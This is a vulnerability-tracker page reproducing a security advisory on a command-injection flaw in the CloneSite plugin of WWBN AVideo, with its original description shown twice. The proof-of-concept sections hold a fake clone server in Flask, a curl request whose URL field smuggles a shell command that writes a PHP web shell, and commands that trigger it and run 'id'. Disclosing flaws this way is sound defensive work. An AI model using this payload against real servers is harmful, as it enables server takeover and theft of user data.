Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
8.7
CloneSite Plugin Allows Remote Code Execution in WWBN AVideo
GHSA-xr6f-h4x7-r6qp
Summary
The CloneSite plugin in WWBN AVideo contains a vulnerability that allows an attacker to inject malicious commands, potentially leading to remote code execution on the server. This could allow an attacker to access and modify sensitive data or take control of the server. To protect against this vulnerability, update the CloneSite plugin to the latest version or remove it if not necessary.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| composer | wwbn | avideo | <= 29.0 |
Original title
WWBN AVideo: RCE cause by clonesite plugin
Original description
Description
## Summary
The `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.
## Details
Inside `plugin/CloneSite/cloneClient.json.php`(line112) didn't have proper sanitization
```php
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));
```
use `str_replace ` make `'` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce
```php
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; \\116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; \\117
exec($cmd . " 2>&1", $output, $return_val); \\119
```
The attack flow
1. make a evil site to provide date
2. add evil url in `objects/pluginAddDataObject.json.php`
3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce
## Poc
make a evil site use python like this
```python
from flask import Flask, jsonify, request
app = Flask(__name__)
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
print("PATH:", path)
return jsonify({
"error": False,
"msg": "",
"url": "http://target-site.com/",
"key": "target_clone_key",
"useRsync": 0,
"videosDir": "/var/www/html/AVideo/videos/",
"sqlFile": "Clone_mysqlDump_evil123.sql",
"videoFiles": [],
"photoFiles": []
})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8071)
```
change url with payload like (need admin)
```shell
curl -b 'PHPSESSID=<admin_session>'
-X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \
-H "Content-Type: application/json" \
-d '{
"cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[1])?>\"${IFS}>1.php;/",
"cloneSiteSSHIP":"127.0.0.1",
"cloneSiteSSHUser":"1",
"cloneSiteSSHPort":"22",
"cloneSiteSSHPassword":{
"type":"encrypted",
"value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="
},
"useRsync":true,
"MaintenanceMode":false,
"myKey":"ba882541262f3202ee5a5ad790ae5b70"
}'
#inject evil code
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php" #trigger rce to write 1.php
curl "http://127.0.0.1/plugin/CloneSite/1.php"
-d '1=id'
#uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
this payload is to create a web shell
then access `plugin/CloneSite/cloneClient.json.php`
`1.php`will be created
## impact
- **Remote Code Execution**: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.
- **Full server compromise**: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.
## Recommended Fix
add more powerful sanitization for `$objClone->cloneSiteURL`
## Summary
The `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.
## Details
Inside `plugin/CloneSite/cloneClient.json.php`(line112) didn't have proper sanitization
```php
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));
```
use `str_replace ` make `'` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce
```php
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; \\116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; \\117
exec($cmd . " 2>&1", $output, $return_val); \\119
```
The attack flow
1. make a evil site to provide date
2. add evil url in `objects/pluginAddDataObject.json.php`
3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce
## Poc
make a evil site use python like this
```python
from flask import Flask, jsonify, request
app = Flask(__name__)
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
print("PATH:", path)
return jsonify({
"error": False,
"msg": "",
"url": "http://target-site.com/",
"key": "target_clone_key",
"useRsync": 0,
"videosDir": "/var/www/html/AVideo/videos/",
"sqlFile": "Clone_mysqlDump_evil123.sql",
"videoFiles": [],
"photoFiles": []
})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8071)
```
change url with payload like (need admin)
```shell
curl -b 'PHPSESSID=<admin_session>'
-X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \
-H "Content-Type: application/json" \
-d '{
"cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[1])?>\"${IFS}>1.php;/",
"cloneSiteSSHIP":"127.0.0.1",
"cloneSiteSSHUser":"1",
"cloneSiteSSHPort":"22",
"cloneSiteSSHPassword":{
"type":"encrypted",
"value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="
},
"useRsync":true,
"MaintenanceMode":false,
"myKey":"ba882541262f3202ee5a5ad790ae5b70"
}'
#inject evil code
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php" #trigger rce to write 1.php
curl "http://127.0.0.1/plugin/CloneSite/1.php"
-d '1=id'
#uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
this payload is to create a web shell
then access `plugin/CloneSite/cloneClient.json.php`
`1.php`will be created
## impact
- **Remote Code Execution**: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.
- **Full server compromise**: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.
## Recommended Fix
add more powerful sanitization for `$objClone->cloneSiteURL`
ghsa CVSS4.0
8.7
Vulnerability type
CWE-78
OS Command Injection
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026